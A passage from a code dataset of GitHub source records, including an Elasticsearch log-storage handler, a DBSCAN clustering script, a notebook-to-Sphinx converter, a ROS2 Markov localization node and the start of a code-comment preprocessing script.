检查集群是否支持冷热数据功能\n raise HotColdCheckException()\n\n # 对于新数据,路由到热节点\n params[\"default_storage_config\"][\"index_settings\"].update(\n {\n f\"index.routing.allocation.include.{hot_warm_config['hot_attr_name']}\": hot_warm_config[\n \"hot_attr_value\"\n ],\n }\n )\n # n天后的数据,路由到冷节点\n params[\"default_storage_config\"].update(\n {\n \"warm_phase_days\": allocation_min_days,\n \"warm_phase_settings\": {\n \"allocation_attr_name\": hot_warm_config[\"warm_attr_name\"],\n \"allocation_attr_value\": hot_warm_config[\"warm_attr_value\"],\n \"allocation_type\": \"include\",\n },\n }\n )\n\n # 获取清洗配置\n collector_scenario = CollectorScenario.get_instance(collector_scenario_id=instance.collector_scenario_id)\n built_in_config = collector_scenario.get_built_in_config(es_version)\n result_table_config = self.get_result_table_config(fields, etl_params, built_in_config, es_version=es_version)\n\n params.update(result_table_config)\n\n # 字段mapping优化\n for field in params[\"field_list\"]:\n # 如果datetype不支持doc_values,则不设置doc_values,避免meta判断类型不一致创建新的index\n if \"es_doc_values\" in field.get(\"option\", {}):\n if field[\"option\"][\"es_doc_values\"] or field[\"option\"][\"es_type\"] in [\"date\", \"text\"]:\n del field[\"option\"][\"es_doc_values\"]\n # 移除计分\n if \"es_type\" in field.get(\"option\", {}) and field[\"option\"][\"es_type\"] in [\"text\"]:\n field[\"option\"][\"es_norms\"] = False\n\n # 时间默认为维度\n if \"time_option\" in params and \"es_doc_values\" in params[\"time_option\"]:\n del params[\"time_option\"][\"es_doc_values\"]\n\n # 获取结果表是否已经创建,如果创建则选择更新\n table_id = \"\"\n try:\n table_id = TransferApi.get_result_table({\"table_id\": params[\"table_id\"]}).get(\"table_id\")\n except ApiResultError:\n pass\n\n # 兼容插件与采集项\n if not table_id:\n # 创建结果表\n table_id = TransferApi.create_result_table(params)[\"table_id\"]\n else:\n # 更新结果表\n params[\"table_id\"] = table_id\n TransferApi.modify_result_table(params)\n cache.delete(CACHE_KEY_CLUSTER_INFO.format(table_id))\n\n if not instance.table_id:\n instance.table_id = table_id\n instance.save()\n\n return {\"table_id\": instance.table_id, \"params\": params}\n\n @classmethod\n def switch_result_table(cls, collector_config: CollectorConfig, is_enable=True):\n \"\"\"\n 起停result_table\n :param collector_config: 采集项\n :param is_enable: 是否有效\n :return:\n \"\"\"\n params = {\n \"bk_data_id\": collector_config.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": f\"{collector_config.table_id}\",\n \"is_enable\": is_enable,\n }\n TransferApi.switch_result_table(params)\n return True\n\n @classmethod\n def parse_result_table_config(cls, result_table_config, result_table_storage=None):\n \"\"\"\n 根据meta配置返回前端格式\n :param result_table_config metadata_get_result_table\n :param result_table_storage metadata_get_result_table_storage\n \"\"\"\n\n # 存储配置 && 清洗配置\n collector_config = {\"etl_params\": result_table_config.get(\"option\", {})}\n if result_table_storage:\n collector_config[\"storage_cluster_id\"] = result_table_storage[\"cluster_config\"][\"cluster_id\"]\n collector_config[\"storage_cluster_name\"] = result_table_storage[\"cluster_config\"][\"cluster_name\"]\n collector_config[\"retention\"] = result_table_storage[\"storage_config\"].get(\"retention\")\n collector_config[\"allocation_min_days\"] = result_table_storage[\"storage_config\"].get(\"warm_phase_days\")\n\n # 字段\n built_in_fields = FieldBuiltInEnum.get_choices()\n field_list = []\n time_fields = [item for item in result_table_config[\"field_list\"] if item[\"field_name\"] == \"dtEventTimeStamp\"]\n if not time_fields:\n raise EtlParseTimeFieldException()\n time_field = copy.deepcopy(time_fields[0])\n\n # log clustering fields\n log_clustering_fields = cls._get_log_clustering_default_fields()\n for field in result_table_config[\"field_list\"]:\n # 判断是不是标准字段\n if not field.get(\"is_built_in\", False):\n field[\"is_built_in\"] = True if field[\"field_name\"].lower() in built_in_fields else False\n\n # 聚类保留字段\n if field[\"field_name\"] in log_clustering_fields:\n continue\n\n # 如果有指定别名,则需要调转位置(field_name:ES入库的字段名称;alias_name:数据源的字段名称)\n field_option = field.get(\"option\", {})\n if field_option.get(\"real_path\"):\n field[\"alias_name\"] = field_option[\"real_path\"].replace(f\"{cls.separator_node_name}.\", \"\")\n\n if field.get(\"alias_name\"):\n field[\"field_name\"], field[\"alias_name\"] = field[\"alias_name\"], field[\"field_name\"]\n\n # 如果别名与field_name相同,则不返回\n if field[\"field_name\"] == field[\"alias_name\"]:\n field[\"alias_name\"] = \"\"\n\n # 时间字段处理\n field[\"is_time\"] = False\n if field[\"field_name\"] == time_field[\"alias_name\"]:\n field[\"is_time\"] = True\n field[\"is_dimension\"] = True\n # option\n field_es_type = field[\"option\"][\"es_type\"]\n field[\"option\"] = time_field[\"option\"]\n field[\"option\"][\"time_zone\"] = int(time_field[\"option\"][\"time_zone\"])\n field[\"option\"][\"es_type\"] = field_es_type\n\n es_type = field_option.get(\"es_type\", \"keyword\")\n\n # 字段类型\n field[\"field_type\"] = FieldDataTypeEnum.get_field_type(es_type)\n\n # 分词字段设置\n field[\"is_analyzed\"] = False\n if es_type == \"text\":\n field[\"is_analyzed\"] = True\n field[\"is_dimension\"] = False\n field[\"is_delete\"] = field.get(\"is_delete\", False)\n\n # 如果未设置维度,则获取es_doc_values的值\n if \"is_dimension\" not in field:\n field[\"is_dimension\"] = field_option.get(\"es_doc_values\", True)\n if field_option.get(\"es_type\") == \"text\":\n field[\"is_dimension\"] = False\n\n field_list.append(field)\n\n # 添加删除字段\n if result_table_config[\"option\"].get(\"separator_fields_remove\"):\n fields_remove = result_table_config[\"option\"][\"separator_fields_remove\"].split(\",\")\n for field_name in fields_remove:\n field_name = field_name.strip()\n if field_name == \"\":\n continue\n\n field_info = copy.deepcopy(FIELD_TEMPLATE)\n field_info[\"field_name\"] = field_name\n field_list.append(field_info)\n\n collector_config[\"fields\"] = sorted(field_list, key=lambda x: x.get(\"option\", {}).get(\"field_index\", 0))\n return collector_config\n\n def _to_bkdata_assign(self, field):\n key = field.get(\"alias_name\")\n if not key:\n key = field.get(\"field_name\")\n return {\n \"key\": key,\n \"assign_to\": key,\n \"type\": BKDATA_ES_TYPE_MAP.get(field.get(\"option\").get(\"es_type\"), \"string\"),\n }\n\n def _to_bkdata_conf(self, time_field):\n return {\n \"output_field_name\": \"timestamp\",\n \"time_format\": time_field[\"option\"][\"time_format\"],\n \"timezone\": time_field[\"option\"][\"time_zone\"],\n \"encoding\": \"UTF-8\",\n \"timestamp_len\": 0,\n \"time_field_name\": time_field.get(\"alias_name\"),\n }\n\n def _get_bkdata_default_fields(self, built_in_fields, time_field):\n result = [\n self._to_bkdata_assign(built_in_field)\n for built_in_field in built_in_fields\n if not built_in_field.get(\"flat_field\", False)\n ]\n if not time_field.get(\"option\", {}).get(\"real_path\"):\n result.append(self._to_bkdata_assign(time_field))\n result.append(\n self._to_bkdata_assign({\"field_name\": \"time\", \"alias_name\": \"time\", \"option\": {\"es_type\": \"long\"}})\n )\n return result\n\n @classmethod\n def _get_log_clustering_default_fields(cls):\n return {field[\"field_name\"] for field in CollectorScenario.log_clustering_fields()}\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/etl_storage/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"}
+{"seq_id":"28862100727","text":"w = float(input())\nh = float(input())\n\nw_to_cm = w*100\nh_to_cm = h*100\n\nrows = w_to_cm // 120\nh_to_cm -= 100\nburos_in_rows = h_to_cm // 70\n\nseats = rows*buros_in_rows - 3\nprint(seats)","repo_name":"yanchev93/SoftUni-Courses","sub_path":"SoftUni - Python/Python - PBasics/More exercise/PB/1_More_Excersice/5_training_lab.py","file_name":"5_training_lab.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36413492940","text":"from sklearn.cluster import KMeans,DBSCAN\r\nimport numpy as np\r\nimport scipy.io as si\r\nimport matplotlib.pyplot as plt\r\nX, Y, Z = np.loadtxt('filtereddata/XYZ_norm1.txt',skiprows=0,unpack=True)\r\nData = np.column_stack((X,Y,Z))\r\n#Z = np.hsplit(Data,np.array([80])) \r\n\r\n#kmeans =KMeans(n_clusters=2,random_state=42,max_iter=10000,n_init=100).fit(Z[0])\r\n\r\n# epsilon = np.arange(0.1,2,0.025)\r\n\r\n# for e in epsilon:\r\n\r\n# \tdbscan = DBSCAN(eps=e,algorithm='kd_tree', min_samples=2).fit(Data)\r\n# \tprint(e)\r\n# \tprint(dbscan.labels_)\r\n\r\ndbscan = DBSCAN(eps = 0.874,algorithm='kd_tree',min_samples=2).fit(Data)\r\nprint(dbscan.labels_)\r\nprint(Data.shape)\r\n\r\n\r\n\r\n# print(Z)\r\n# pred = Data[1]\r\n\r\n\r\npred = np.column_stack((Data,dbscan.labels_))\r\nprint(pred.shape)\r\n\r\n\r\nfor index in range(0,len(Z)):\r\n\tif(dbscan.labels_[index]<0):\r\n\t\tprint(index)\r\n\t\tt = np.linspace(0, 2, 64, endpoint=False)\r\n\t\tplt.plot(t, Z[index-32:index+32], 'g-', linewidth=2, label='filtered data')\r\n\t\tplt.xlabel('Time [sec]')\r\n\t\tplt.legend()\r\n\t\tplt.show()\r\n\r\n\r\n#np.savetxt('filtereddata/predictxyz1.txt',pred,fmt='%1.15g')\r\n\r\nprint(\"Prediction data ready\")","repo_name":"saainithil97/roadsafe","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72637773929","text":"#! /usr/bin/env python\n\"\"\"\nConvert empty IPython notebook to a sphinx doc page.\n\"\"\"\nimport io\nimport os\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef clean_for_doc(nb):\n \"\"\"\n Cleans the notebook to be suitable for inclusion in the docs.\n \"\"\"\n new_cells = []\n for cell in nb.worksheets[0].cells:\n # Remove the pylab inline line cells.\n if \"input\" in cell and \\\n cell[\"input\"].strip().startswith(\"%pylab inline\"):\n continue\n\n # Make sure all cells are padded at the top and bottom.\n if \"source\" in cell:\n cell[\"source\"] = \"\\n\" + cell[\"source\"].strip() + \"\\n\\n\"\n\n # Remove output resulting from the stream/trace method chaining.\n if \"outputs\" in cell:\n outputs = [_i for _i in cell[\"outputs\"] if \"text\" not in _i or\n not _i[\"text\"].startswith(\"= os.path.getmtime(nbname):\n print(\"\\t%s is up to date; nothing to do.\" % rst_name)\n return\n\n os.system(\"runipy --o %s --matplotlib --quiet\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = clean_for_doc(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\n # Convert to rst.\n os.system(\"jupyter nbconvert --to rst %s\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = strip_output(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\nif __name__ == \"__main__\":\n for nbname in sys.argv[1:]:\n convert_nb(nbname)\n","repo_name":"yjgao-gfz/pyadjoint","sub_path":"pyadjoint/doc/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74371436008","text":"import math\nimport os\nimport pathlib\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom cv_bridge import CvBridge\n\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSReliabilityPolicy, QoSHistoryPolicy,QoSDurabilityPolicy\nimport numpy as np\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom vqa_msgs.msg import VisualFeatures\n\n\nfrom scipy import ndimage, signal\n\nfrom tf2_ros import TransformBroadcaster, TransformException\nfrom tf2_ros.buffer import Buffer\nfrom tf2_ros.transform_listener import TransformListener\nfrom tf2_ros.static_transform_broadcaster import StaticTransformBroadcaster\n\nfrom message_filters import ApproximateTimeSynchronizer, Subscriber, Cache\nfrom topological_mapping.topological_mapping.topological_map import TopologicalMap\nfrom geometry_msgs.msg import TransformStamped\n\n\nclass TopologicalLocalization(Node):\n def __init__(self):\n super().__init__('topological_localization')\n\n map_qos_profile = QoSProfile(\n reliability=QoSReliabilityPolicy.RELIABLE,\n history=QoSHistoryPolicy.KEEP_LAST,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL,\n depth=1\n )\n\n # parameters\n self.declare_parameter('map_resolution', 0.050)\n self.declare_parameter('kernel_scale', 8.0)\n self.declare_parameter('question_qty', 10)\n self.declare_parameter('state_qty', 8)\n self.declare_parameter('max_images_per_state', 10)\n \n # it is the number the map(gridmap) shape will be divided by:\n self.kernel_scale = self.get_parameter('kernel_scale').get_parameter_value().double_value\n self.state_qty = self.get_parameter('state_qty').get_parameter_value().integer_value\n self.question_qty = self.get_parameter('question_qty').get_parameter_value().integer_value\n self.question_depth = self.get_parameter(\n 'max_images_per_state').get_parameter_value().integer_value\n # m/pix\n self.map_resolution = self.get_parameter(\n 'map_resolution').get_parameter_value().double_value\n\n self.__pkg_folder = str(pathlib.Path(__file__).parent.resolve()).removesuffix(\n '/topological_localization')\n self.map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map4.npy')\n self.image_map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map3.jpg')\n\n self.vqa_features = None\n self.image_converter = CvBridge()\n self.tf_static_broadcaster = StaticTransformBroadcaster(self)\n self.tf_broadcaster = TransformBroadcaster(self)\n self.tf_buffer = Buffer()\n self.tf_listener = TransformListener(self.tf_buffer, self)\n self.map_helper = None\n self.odom_pose = None\n self.visualizer = None\n # init prediction variables\n self.odom_pose = Odometry().pose\n self.odom_pose.pose.position.x = 0.0\n self.odom_pose.pose.position.y = 0.0\n self.d_increment = self.angle_increment = 0.0\n self.odom_list = []\n # 1.76 s convolution + 4 s perception \n self.timer = self.create_timer(8.0, self.control_cycle)\n # publishers \n self.pose_publisher = self.create_publisher(PoseWithCovarianceStamped, '/markov_pose', 1)\n self.grid_publisher = self.create_publisher(OccupancyGrid,\n '/motion_update/localization_grid',\n 1)\n # subscribers\n self.create_subscription(OccupancyGrid,\n '/map',\n self.map_callback,\n qos_profile=map_qos_profile) \n \n self.tss = ApproximateTimeSynchronizer([Subscriber(self, Odometry, 'odom'),\n Subscriber(self, VisualFeatures, 'features')],\n 10,\n 6)\n self.tss.registerCallback(self.feature_callback)\n\n self.broadcast_map()\n\n def control_cycle(self):\n\n\n self.odom_list.append(self.odom_pose)\n if len(self.odom_list) > 2:\n self.odom_list.pop(0)\n\n if len(self.odom_list) < 2 or self.vqa_features is None:\n return\n self.get_logger().debug('executing algorithm')\n\n self.d_increment, self.angle_increment = self._calculate_increment(self.odom_list)\n self.localization_algorithm()\n # image = self.grid_to_img()\n # msg = self.img_to_occupancy(image)\n\n # self.grid_publisher.publish(msg)\n\n def map_callback(self, msg):\n\n self.map_helper = TopologicalMap(msg,\n self.state_qty,\n self.question_qty,\n self.question_depth)\n\n self.get_logger().info('loading topological map .. ')\n self.get_logger().info('map folder path ' + self.map_folder)\n self.map_helper.load_map(self.map_folder)\n self.init_localization_grid()\n\n\n def grid_to_img(self):\n\n return (self._localization_grid[:, :, 0] * 255).round().astype(np.uint8)\n\n\n def broadcast_map(self):\n\n t = TransformStamped()\n\n t.header.stamp = self.get_clock().now().to_msg()\n t.header.frame_id = 'world'\n t.child_frame_id = 'map'\n\n t.transform.translation.x = 0.0\n t.transform.translation.y = 0.0\n t.transform.translation.z = 0.0\n\n t.transform.rotation.x = 0.0\n t.transform.rotation.y = 0.0\n t.transform.rotation.z = 0.0\n t.transform.rotation.w = 1.0\n\n self.tf_static_broadcaster.sendTransform(t)\n\n def img_to_occupancy(self, image):\n\n if self.map_helper is None:\n return\n\n image = image * 100\n\n map = self.map_helper.occupancy_map\n data = np.array(image.flatten(), dtype=np.int8)\n\n map.data = data.tolist()\n\n return map\n\n\n def feature_callback(self, odom_msg, vqa_msg):\n\n if self.map_helper is None:\n return\n \n self.vqa_features = vqa_msg\n self.odom_pose = odom_msg.pose\n\n return True\n\n def init_localization_grid(self):\n\n self._localization_grid = np.full(\n shape=(self.map_helper.occupancy_map.info.height,\n self.map_helper.occupancy_map.info.width,\n self.state_qty+1),\n fill_value=1/((self.state_qty+1)*self.map_helper.occupancy_map.info.height*\n self.map_helper.occupancy_map.info.width))\n\n # 116,192 center coordinates\n # self._localization_grid[105:125,180:200,0] = 0.45\n self.get_logger().info(\"grid initialized\")\n\n return True\n\n def convolve_1d(self, kernel_1d):\n \n _ = np.apply_along_axis(lambda m: np.convolve(m, kernel_1d, mode=\"same\"), axis=-1, arr=self._localization_grid[:,:,1:])\n self._localization_grid[:,:,1:] = _\n\n return True\n \n def _calculate_1d_kernel_size(self):\n\n size = int(np.round(self.state_qty / self.kernel_scale))\n \n return size\n\n def _calculate_1d_kernel_center(self,odom_pose,kernel_shape,is_centered=False):\n\n kernel_resolution = 2*np.pi / kernel_shape #rad/div\n angle = self.map_helper._quaternion_to_euler(odom_pose.pose.orientation)[-1]\n if angle < 0:\n angle = angle + 2*np.pi\n elif angle > 2 * np.pi:\n angle = 2 * np.pi\n if is_centered:\n center = int(np.round(kernel_shape/2))\n else: \n center = int(np.round(angle/kernel_resolution))\n\n return center\n \n def _calculate_2d_kernel_size(self):\n\n height = int(self.map_helper.occupancy_map.info.height / self.kernel_scale)\n width = int(self.map_helper.occupancy_map.info.width / self.kernel_scale) \n \n return (height, width)\n\n def _calculate_2d_kernel_center(self, odom_pose, kernel_shape, is_centered=False):\n\n kernel_resolution = ((self.map_helper.occupancy_map.info.height * self.map_resolution / kernel_shape[0]) +\n (self.map_helper.occupancy_map.info.width * self.map_resolution / kernel_shape[1]))/2\n \n\n if is_centered: \n h = int(kernel_shape[0]/2)\n w = int(kernel_shape[1]/2)\n else: \n h = int(round((odom_pose.pose.position.y - self.map_helper.occupancy_map.info.origin.position.y ) / kernel_resolution))\n w = int(round((odom_pose.pose.position.x - self.map_helper.occupancy_map.info.origin.position.x ) / kernel_resolution))\n \n return (h, w)\n\n def _calculate_sigma(self):\n return\n\n def _1d_gaussian_kernel(self, k_size=5, sigma=1.0, center=2):\n\n x = np.arange(k_size)\n \n kernel = (1 / (np.sqrt(2 * np.pi) * sigma)) * np.exp(-((x - center) ** 2 / (2 * sigma ** 2)))\n \n kernel = kernel / np.sum(kernel) \n\n return kernel\n \n def _2d_gaussian_kernel(self, k_size=(10, 10), sig=[1, 1], center=(2, 2)):\n # Define the kernel size\n n_h, n_w = k_size\n\n # Define the standard deviation of the Gaussian distribution for each axis\n sigma_h, sigma_w = sig\n\n # Define the center of the kernel\n center_h, center_w = center\n\n # Create 2D coordinate arrays for the kernel using np.mgrid\n y, x = np.mgrid[:n_h, :n_w]\n\n # Calculate the values of the Gaussian distribution at each element of the kernel\n kernel = (1 / (np.sqrt(2 * np.pi) * sigma_h * sigma_w)) * np.exp(-(((x - center_w) ** 2 / (2 * sigma_w ** 2)) + ((y - center_h) ** 2 / (2 * sigma_h ** 2))))\n\n # Normalize the kernel so that the values sum to 1\n kernel = kernel / np.sum(kernel)\n\n return kernel\n\n def motion_update(self, delta_distance, delta_theta):\n\n self.get_logger().debug(f'delta distance{delta_distance}') \n if delta_distance <= 0.1:\n centered_2d = True\n else:\n centered_2d = False\n if delta_theta <= 0.0872665:\n centered_1d = True\n else:\n centered_1d = False\n\n kernel_shape_2d = self._calculate_2d_kernel_size()\n kernel_shape_1d = self._calculate_1d_kernel_size()\n\n center_2d = self._calculate_2d_kernel_center(self.odom_pose, kernel_shape_2d, is_centered=centered_2d)\n center_1d = self._calculate_1d_kernel_center(self.odom_pose, kernel_shape_1d, is_centered=centered_1d)\n\n gauss_kernel_2d = self._2d_gaussian_kernel(kernel_shape_2d, center=center_2d)\n gauss_kernel_1d = self._1d_gaussian_kernel(kernel_shape_1d, center=center_1d)\n\n self._localization_grid[:, :, 0] = signal.fftconvolve(self._localization_grid[:, :, 0], gauss_kernel_2d, mode='same')\n self.convolve_1d(gauss_kernel_1d)\n self.get_logger().debug(f\"center 2d {center_2d}\")\n\n return True\n\n def normalize_grid(self):\n\n self._localization_grid = self._localization_grid / self._localization_grid.max()\n \n def perception_update(self):\n\n # question_answers_indexes = []\n # question_answers_accs = []\n\n # for i in range(len(self.vqa_features.data)):\n\n # # 'refrigerator' \n # ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # # we keep only coincidences in the current question \n # ind = ind[0][np.where(ind[1] == i)]\n \n # # we keep the topological indexes where there is a coincidence :\n # current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n # current_question_acc = []\n \n # # we extract the accuracy for each one of them (acc of question times acc of map) \n # for index in np.unique(ind):\n # acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n # acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n # current_question_acc.append(acc)\n\n # question_answers_indexes.extend(current_question_indexes.tolist())\n # question_answers_accs.extend(current_question_acc)\n\n \n # current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # # there are repeated indexes\n # unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n\n\n\n # # Iterate over the unique elements\n # for i in unique_elements:\n\n # indices = np.where(current_map_raw[:, 0] == i)\n # values = current_map_raw[indices][:, 1]\n # product = np.prod(values)\n \n # col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # self._localization_grid[row,col,0] *= (1/product)\n # self._localization_grid[row,col,state] *= (1/product) \n\n question_answers_indexes = []\n question_answers_accs = []\n\n for i in range(len(self.vqa_features.data)):\n\n ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # we keep only coincidences in the current question \n ind = ind[0][np.where(ind[1] == i)]\n \n # we keep the topological indexes where there is a coincidence :\n current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n current_question_acc = []\n \n # we extract the accuracy for each one of them (acc of question times acc of map) \n for index in np.unique(ind):\n acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n current_question_acc.append(acc)\n\n question_answers_indexes.extend(current_question_indexes.tolist())\n question_answers_accs.extend(current_question_acc)\n \n current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # there are repeated indexes\n unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n # Iterate over the unique elements\n for i in unique_elements:\n\n indices = np.where(current_map_raw[:, 0] == i)\n values = current_map_raw[indices][:, 1]\n product = np.prod(values)\n \n col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # change to sum\n self._localization_grid[row,col,0] += (1/product)\n self._localization_grid[row,col,state] += (1/product) \n\n self.normalize_grid()\n\n return True\n \n\n def publish_pose(self,covariance=1.0):\n \n ind = np.unravel_index(np.argmax(self._localization_grid, axis=None), self._localization_grid.shape)\n x, y = self.map_helper._get_world_x_y(ind[1], ind[0])\n theta = self.map_helper._undiscretize_angle(ind[2])\n \n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = 'map'\n msg.header.stamp = self.get_clock().now().to_msg()\n\n msg.pose.pose.position.x = x\n msg.pose.pose.position.y = y\n msg.pose.pose.position.z = 0.0\n\n q = self.map_helper._quaternion_from_euler(0.0, 0.0, theta)\n msg.pose.pose.orientation.x = q[0]\n msg.pose.pose.orientation.y = q[1]\n msg.pose.pose.orientation.z = q[2]\n msg.pose.pose.orientation.w = q[3]\n\n self.pose_publisher.publish(msg)\n \n return True\n\n def _calculate_increment(self,msg_buffer):\n\n initial_distance = math.sqrt(msg_buffer[0].pose.position.x ** 2 + \n msg_buffer[0].pose.position.y ** 2 +\n msg_buffer[0].pose.position.z ** 2)\n\n current_distance = math.sqrt(msg_buffer[1].pose.position.x ** 2 + \n msg_buffer[1].pose.position.y ** 2 +\n msg_buffer[1].pose.position.z ** 2)\n\n initial_angle = self.map_helper._quaternion_to_euler(msg_buffer[0].pose.orientation)[-1]\n current_angle = self.map_helper._quaternion_to_euler(msg_buffer[1].pose.orientation)[-1]\n \n distance_increment = abs(current_distance - initial_distance)\n angle_increment = abs(current_angle - initial_angle)\n\n return distance_increment, angle_increment\n\n def localization_algorithm(self):\n\n self.perception_update()\n self.motion_update(self.d_increment, self.angle_increment)\n\n self.publish_pose()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n topo_node = TopologicalLocalization()\n\n rclpy.spin(topo_node)\n\n\n topo_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"juandpenan/topology_nav_ros2","sub_path":"topological_localization/topological_localization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41738315662","text":"import gzip\nimport multiprocessing\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim.models import Word2Vec\nfrom spacy_langdetect import LanguageDetector\nfrom yaspin import yaspin\n\nfrom visualize_embeddings import tsne_plot\n\nORTH = spacy.symbols.ORTH\n\n\ndef round_down(num):\n i = str(num)\n divisor_max = 2 if num < 1000 else 3\n divisor_idx = min(len(i), divisor_max)\n\n divisor = \"\".join(i[:divisor_idx])\n\n for i in range(len(divisor), len(i)):\n divisor = divisor + \"0\"\n\n divisor = int(divisor)\n\n return floor(num / divisor) * divisor\n\n\ndef splitForwardSlashes(match):\n slashes = list(match.group(0))\n return \" \".join(slashes)\n\n\ndef clean_token(text):\n # normalize\n text = text.lower()\n\n # replace URLs\n text = re.sub(r\"(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b\", \"URL\", text)\n\n # custom splitting rule to create space around special code characters\n text = re.sub(r\"([.,()<>\\[\\]{}\\\"\\'`\\-$=_;%|~^\\\\])\", r\" \\1 \", text)\n\n # replace multiple forward slashes\n text = re.sub(r\"\\/{3,}\", lambda m: splitForwardSlashes(m), text)\n\n # replace tab stops\n text = re.sub(r\"\\t\", \"\", text)\n\n # replace newlines with a special \"end-of-sequence\" token\n text = re.sub(r\"\\r\\n|\\r|\\n\", \" \", text)\n\n return text\n\n\ndef clean_document(doc):\n \"\"\" Clean up comments. Tokenize, lowercase, and remove characters that are not allowed \"\"\"\n\n # filter out English comments\n isEnglish = lambda doc: doc._.language[\"language\"] == \"en\"\n\n if not isEnglish(doc):\n return nlp.make_doc(\"\")\n\n # clean each token in document\n text = [token for token in (clean_token(tok.text) for tok in doc) if token != \"\"]\n\n text = \" \".join(text)\n\n # adding a start and an end token to the sentence so that\n # the model know when to start and stop predicting\n text = \" \" + text + \" \"\n\n # replace multiple whitespaces with a single whitespace\n text = re.sub(r\" {2,}\", \" \", text)\n\n return nlp.make_doc(text)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n# add special cases for the tokenizer\nnlp.tokenizer.add_special_case(\"/**\", [{ORTH: \"/**\"}])\nnlp.tokenizer.add_special_case(\"/*\", [{ORTH: \"/*\"}])\nnlp.tokenizer.add_special_case(\"*/\", [{ORTH: \"*/\"}])\nnlp.tokenizer.add_special_case(\"//\", [{ORTH: \"//\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\n\nnlp.add_pipe(clean_document, name=\"cleaner\", last=True)\nnlp.add_pipe(LanguageDetector(), name=\"language_detector\", before=\"cleaner\")\n\nboolean = lambda x: (str(x).lower() == \"true\")\n\nparser = ArgumentParser()\n\nparser.add_argument(\n \"-v\", \"--visualize\", nargs=\"?\", type=boolean, const=True, default=False\n)\n\nparser.add_argument(\n \"-s\", \"--save-dataset\", nargs=\"?\", type=boolean, const=True, default=True\n)\n\nparser.add_argument(\"-t\", \"--train\", nargs=\"?\", type=boolean, const=True, default=False)\n\nparser.add_argument(\n \"-d\", \"--dataset\", nargs=\"?\", type=str, const=True, default=\"dataset.json\"\n)\n\nargs = parser.parse_args()\n\nsaveDataset = args.save_dataset\nvisualize = args.visualize\ntrain = args.train\n\ndata_dir = \"../data\"\nmetadata_filename = \"metadata.txt\"\nmetadata_path = path.join(data_dir, metadata_filename)\ndataset_path = path.join(data_dir, args.dataset)\nfilename_dataset_clean = \"dataset_clean.csv\"\n\nif not path.exists(dataset_path):\n sys.exit(\n \"Error: Couldn't find '{}'. Make sure to generate a dataset first.\".format(\n path.basename(dataset_path)\n )\n )\n\nout_dir = \"../runs\"\n\n# create output dir\nif not path.exists(out_dir):\n makedirs(out_dir)\n\ndf = pd.read_json(dataset_path, lines=True)\n\n# create run dir\nrun_dir = \"\"\n\n# --- Hyper-Parameters ---\n\n# more dimensions mean more computationally expensive,\n# but also more accurate. 300 is a decent compromise\nnum_features = 300\n\n# minimum count of words to consider when training the model\nmin_word_count = 3\n\n# run training in parallel, more workers = faster training\nnum_workers = multiprocessing.cpu_count()\n\n# size of the sliding window (number of words around the target window)\nwindow_size = 7\n\n# determines how often do we want to look at the same word\ndownsampling = 1e-3\n\n# used to pick what part 